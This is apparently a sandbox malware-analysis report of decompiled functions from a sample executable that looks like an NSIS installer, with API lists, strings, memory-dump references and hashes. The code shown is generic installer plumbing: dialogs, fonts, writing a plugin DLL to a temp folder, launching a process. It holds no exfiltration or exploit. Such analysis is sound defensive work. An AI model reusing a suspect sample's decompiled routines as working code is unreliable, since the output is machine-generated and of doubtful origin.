                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401D38, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E00401D38() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x40b014->lfHeight =  ~(MulDiv(E00402A0C(2), _t6, 0x48));
				 *0x40b024 = E00402A0C(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x18));
				 *0x40b02b = 1;
				 *0x40b028 = _t11 & 0x00000001;
				 *0x40b029 = _t11 & 0x00000002;
				 *0x40b02a = _t11 & 0x00000004;
				E00405BBA(_t18, _t24, _t26, 0x40b030,  *((intOrPtr*)(_t28 - 0x24)));
				_t14 = CreateFontIndirectA(0x40b014);
				_push(_t14);
				_push(_t26);
				E00405AF6();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                                          0x00401d46
                                                                                                                          0x00401d5f
                                                                                                                          0x00401d69
                                                                                                                          0x00401d6e
                                                                                                                          0x00401d79
                                                                                                                          0x00401d80
                                                                                                                          0x00401d92
                                                                                                                          0x00401d98
                                                                                                                          0x00401d9d
                                                                                                                          0x00401da7
                                                                                                                          0x004024eb
                                                                                                                          0x00401561
                                                                                                                          0x00402866
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(?), ref: 00401D3F
                                                                                                                          • GetDeviceCaps.GDI32(00000000), ref: 00401D46
                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D55
                                                                                                                          • CreateFontIndirectA.GDI32(0040B014), ref: 00401DA7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontIndirect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3272661963-0
                                                                                                                          • Opcode ID: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                                                                          • Instruction ID: 0c2e595a2d755a053b7cc3d6c09569b1e3f8f946256c05fe5e222a6b1ed621d0
                                                                                                                          • Opcode Fuzzy Hash: 91a73ead397859bf4c0615e863a468d78fcadc575e8fb258f1077711b7347c7d
                                                                                                                          • Instruction Fuzzy Hash: B0F0C870E48280AFE70157705F0ABAB3F64D715305F100876F251BA2E3C7B910088BAE
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00402BF1, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00402BF1(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x4170e0; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x423f4c;
						if(_t2 >  *0x423f4c) {
							_t3 = CreateDialogParamA( *0x423f40, 0x6f, 0, E00402B6E, 0);
							 *0x4170e0 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00405F64(0);
					}
				} else {
					_t6 =  *0x4170e0; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x4170e0 = 0;
					return _t6;
				}
			}






                                                                                                                          0x00402bf8
                                                                                                                          0x00402c12
                                                                                                                          0x00402c18
                                                                                                                          0x00402c22
                                                                                                                          0x00402c28
                                                                                                                          0x00402c2e
                                                                                                                          0x00402c3f
                                                                                                                          0x00402c48
                                                                                                                          0x00000000
                                                                                                                          0x00402c4d
                                                                                                                          0x00402c54
                                                                                                                          0x00402c1a
                                                                                                                          0x00402c21
                                                                                                                          0x00402c21
                                                                                                                          0x00402bfa
                                                                                                                          0x00402bfa
                                                                                                                          0x00402c01
                                                                                                                          0x00402c04
                                                                                                                          0x00402c04
                                                                                                                          0x00402c0a
                                                                                                                          0x00402c11
                                                                                                                          0x00402c11

                                                                                                                          APIs
                                                                                                                          • DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
                                                                                                                          • GetTickCount.KERNEL32 ref: 00402C22
                                                                                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
                                                                                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C4D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2102729457-0
                                                                                                                          • Opcode ID: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                                                                          • Instruction ID: 902fecb1894dce430947e24fe85b059bfb73d5b7bbd16117cdf5d745fa908bfb
                                                                                                                          • Opcode Fuzzy Hash: 368aa0899d27fe077c31989b75da56c4405109c76bea3f602025cb1c6477c4a6
                                                                                                                          • Instruction Fuzzy Hash: 37F03030A09321ABC611EF60BE4CA9E7B74F748B417118576F201B11A4CB7858818B9D
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004038B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004038B4(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405B0F(__ecx, "1033");
				while(1) {
					_t26 =  *0x423f84;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423f50 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423f80;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423720 = _t18[1];
					 *0x423fe8 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42371c = _t23;
						E00405AF6(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, 0x423740, 0xfffffffe));
						_t11 =  *0x423f6c;
						_t27 =  *0x423f68;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405BBA(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                                          0x004038b8
                                                                                                                          0x004038bd
                                                                                                                          0x004038c3
                                                                                                                          0x004038c8
                                                                                                                          0x004038c8
                                                                                                                          0x004038d0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004038d8
                                                                                                                          0x004038e0
                                                                                                                          0x004038e2
                                                                                                                          0x004038e8
                                                                                                                          0x004038e8
                                                                                                                          0x004038ea
                                                                                                                          0x004038f6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004038fa
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004038fc
                                                                                                                          0x00403901
                                                                                                                          0x0040390a
                                                                                                                          0x00403910
                                                                                                                          0x00403915
                                                                                                                          0x00403929
                                                                                                                          0x00403934
                                                                                                                          0x0040394c
                                                                                                                          0x00403952
                                                                                                                          0x00403957
                                                                                                                          0x0040395f
                                                                                                                          0x00403980
                                                                                                                          0x00403980
                                                                                                                          0x00403980
                                                                                                                          0x00403961
                                                                                                                          0x00403963
                                                                                                                          0x00403963
                                                                                                                          0x00403967
                                                                                                                          0x0040396e
                                                                                                                          0x0040396e
                                                                                                                          0x00403973
                                                                                                                          0x00403979
                                                                                                                          0x00403979
                                                                                                                          0x00000000
                                                                                                                          0x00403963
                                                                                                                          0x00403917
                                                                                                                          0x0040391c
                                                                                                                          0x00403925
                                                                                                                          0x0040391e
                                                                                                                          0x0040391e
                                                                                                                          0x0040391e
                                                                                                                          0x0040391c

                                                                                                                          APIs
                                                                                                                          • SetWindowTextA.USER32(00000000,00423740), ref: 0040394C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow
                                                                                                                          • String ID: "C:\Users\user\Desktop\PQMW0W5h3X.exe" $1033
                                                                                                                          • API String ID: 530164218-1415722694
                                                                                                                          • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                          • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                                                                                          • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                                                                                          • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404DD4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404DD4(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420520 != _t22) {
							 *0x420520 = _t22;
							E00405B98(0x420538, 0x425000);
							E00405AF6(0x425000, _t22);
							E0040140B(6);
							E00405B98(0x425000, 0x420538);
						}
						L11:
						return CallWindowProcA( *0x420528, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404753(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403EA0(0x413);
				return 0;
			}




                                                                                                                          0x00404de0
                                                                                                                          0x00404e05
                                                                                                                          0x00404e25
                                                                                                                          0x00404e28
                                                                                                                          0x00404e2b
                                                                                                                          0x00404e42
                                                                                                                          0x00404e48
                                                                                                                          0x00404e4f
                                                                                                                          0x00404e56
                                                                                                                          0x00404e5d
                                                                                                                          0x00404e62
                                                                                                                          0x00404e68
                                                                                                                          0x00000000
                                                                                                                          0x00404e78
                                                                                                                          0x00404e12
                                                                                                                          0x00404e65
                                                                                                                          0x00404e65
                                                                                                                          0x00000000
                                                                                                                          0x00404e65
                                                                                                                          0x00404e1e
                                                                                                                          0x00404e20
                                                                                                                          0x00000000
                                                                                                                          0x00404e20
                                                                                                                          0x00404de6
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404ded
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • IsWindowVisible.USER32(?), ref: 00404E0A
                                                                                                                          • CallWindowProcA.USER32 ref: 00404E78
                                                                                                                            • Part of subcall function 00403EA0: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403EB2
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                                          • Opcode ID: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                          • Instruction ID: 907b3508a45335f305929b628defbf7950d0c65962cf50d158fef9db48df65ea
                                                                                                                          • Opcode Fuzzy Hash: d178a5782ca8d626d003a390d0a002469a0ac64d132e68a5e4d1ef6bfeb92247
                                                                                                                          • Instruction Fuzzy Hash: 3B11BF71600208BFDF21AF61DC4099B3769BF843A5F40803BF604791A2C7BC4991DFA9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34filestringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a010 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B0F(_t17 + 8, _t15), "C:\Users\engineer\AppData\Local\Temp\nsgB979.tmp\System.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                                                                                          0x004024f1
                                                                                                                          0x004024f1
                                                                                                                          0x004024f4
                                                                                                                          0x0040250f
                                                                                                                          0x004024f6
                                                                                                                          0x004024f8
                                                                                                                          0x004024fd
                                                                                                                          0x00402504
                                                                                                                          0x00402516
                                                                                                                          0x0040268f
                                                                                                                          0x0040268f
                                                                                                                          0x0040251c
                                                                                                                          0x0040252e
                                                                                                                          0x004015a6
                                                                                                                          0x004015a8
                                                                                                                          0x00000000
                                                                                                                          0x004015ae
                                                                                                                          0x004015a8
                                                                                                                          0x004028c1
                                                                                                                          0x004028cd

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                                                          • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll, xrefs: 004024FD, 00402522
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWritelstrlen
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsgB979.tmp\System.dll
                                                                                                                          • API String ID: 427699356-326003154
                                                                                                                          • Opcode ID: faed2be3babe74328216e072a36557fa4b6c56c80749c58986111d6fd9eb6ae7
                                                                                                                          • Instruction ID: 6775f3f9e4e00d505f4e1783fd87b496617f08e9b0a5c20f68d0788d80e55df2
                                                                                                                          • Opcode Fuzzy Hash: faed2be3babe74328216e072a36557fa4b6c56c80749c58986111d6fd9eb6ae7
                                                                                                                          • Instruction Fuzzy Hash: F9F08971A44244BFD710EFA49E49AEF7668DB40348F10043BF141F51C2D6FC5641966E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004053F8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004053F8(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x422540->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x422540,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                          0x00405401
                                                                                                                          0x0040541d
                                                                                                                          0x00405425
                                                                                                                          0x0040542a
                                                                                                                          0x00000000
                                                                                                                          0x00405430
                                                                                                                          0x00405434

                                                                                                                          APIs
                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040542A
                                                                                                                          Strings
                                                                                                                          • Error launching installer, xrefs: 0040540B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                          • String ID: Error launching installer
                                                                                                                          • API String ID: 3712363035-66219284
                                                                                                                          • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                                                                          • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                                                                                                          • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                                                                                                          • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403556, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403556() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x41f4f4;
				_t3 = E0040353B(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x41f4f4 =  *0x41f4f4 & 0x00000000;
				return _t3;
			}







                                                                                                                          0x00403557
                                                                                                                          0x0040355f
                                                                                                                          0x00403566
                                                                                                                          0x00403569
                                                                                                                          0x00403569
                                                                                                                          0x0040356b
                                                                                                                          0x00403570
                                                                                                                          0x00403577
                                                                                                                          0x0040357d
                                                                                                                          0x00403581
                                                                                                                          0x00403582
                                                                                                                          0x0040358a

                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040352E,00403337,00000020), ref: 00403570
                                                                                                                          • GlobalFree.KERNEL32 ref: 00403577
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403568
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 1100898210-3936084776
                                                                                                                          • Opcode ID: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                          • Instruction ID: e2315670824f3ca0981a6a6bf9743b5050639b1b799e450ff7e3175358b78d1c
                                                                                                                          • Opcode Fuzzy Hash: a60e2798f856a3438fb1e72b6635fdebc83eaeade0927d8150105d3265ee1b70
                                                                                                                          • Instruction Fuzzy Hash: 10E08C329010206BC6215F08FD0479A7A6C6B44B22F11413AE804772B0C7742D424A88
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004056D2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E004056D2(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                          0x004056d3
                                                                                                                          0x004056dd
                                                                                                                          0x004056df
                                                                                                                          0x004056e6
                                                                                                                          0x004056ee
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004056ee
                                                                                                                          0x004056f0
                                                                                                                          0x004056f5

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PQMW0W5h3X.exe,C:\Users\user\Desktop\PQMW0W5h3X.exe,80000000,00000003), ref: 004056D8
                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PQMW0W5h3X.exe,C:\Users\user\Desktop\PQMW0W5h3X.exe,80000000,00000003), ref: 004056E6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-3125694417
                                                                                                                          • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                          • Instruction ID: dce4988d3f9ae1539138201c89f565164349ec5ceb08caa00e339266b5a49006
                                                                                                                          • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                                                          • Instruction Fuzzy Hash: 7FD0A772809D701EF30363108C04B8FBA48CF12310F490862E042E6191C27C6C414BBD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 100010D6, Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E100010D6(void* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char* _t17;
				char _t19;
				void* _t20;
				void* _t24;
				void* _t27;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				signed int _t43;
				void* _t52;
				char* _t53;
				char* _t55;
				void* _t56;
				void* _t58;

				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				 *0x10004060 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004038, E1000189E, _t52);
				_t43 =  *0x10004058 +  *0x10004058 * 4 << 2;
				_t17 = E10001561();
				_a8 = _t17;
				_t53 = _t17;
				if( *_t17 == 0) {
					L16:
					return GlobalFree(_a8);
				} else {
					do {
						_t19 =  *_t53;
						_t55 = _t53 + 1;
						_t58 = _t19 - 0x6c;
						if(_t58 > 0) {
							_t20 = _t19 - 0x70;
							if(_t20 == 0) {
								L12:
								_t53 = _t55 + 1;
								_t24 = E1000159E(E100015E5( *_t55 - 0x30));
								L13:
								GlobalFree(_t24);
								goto L14;
							}
							_t27 = _t20;
							if(_t27 == 0) {
								L10:
								_t53 = _t55 + 1;
								_t24 = E1000160E( *_t55 - 0x30, E10001561());
								goto L13;
							}
							L7:
							if(_t27 == 1) {
								_t31 = GlobalAlloc(0x40, _t43 + 4);
								 *_t31 =  *0x10004030;
								 *0x10004030 = _t31;
								E10001854(_t31 + 4,  *0x10004060, _t43);
								_t56 = _t56 + 0xc;
							}
							goto L14;
						}
						if(_t58 == 0) {
							L17:
							_t34 =  *0x10004030;
							if( *0x10004030 != 0) {
								E10001854( *0x10004060, _t34 + 4, _t43);
								_t37 =  *0x10004030;
								_t56 = _t56 + 0xc;
								GlobalFree(_t37);
								 *0x10004030 =  *_t37;
							}
							goto L14;
						}
						_t39 = _t19 - 0x4c;
						if(_t39 == 0) {
							goto L17;
						}
						_t40 = _t39 - 4;
						if(_t40 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L12;
						}
						_t27 = _t40;
						if(_t27 == 0) {
							 *_t55 =  *_t55 + 0xa;
							goto L10;
						}
						goto L7;
						L14:
					} while ( *_t53 != 0);
					goto L16;
				}
			}


















                                                                                                                          0x100010dd
                                                                                                                          0x100010e5
                                                                                                                          0x100010f9
                                                                                                                          0x10001101
                                                                                                                          0x1000110c
                                                                                                                          0x1000110f
                                                                                                                          0x10001117
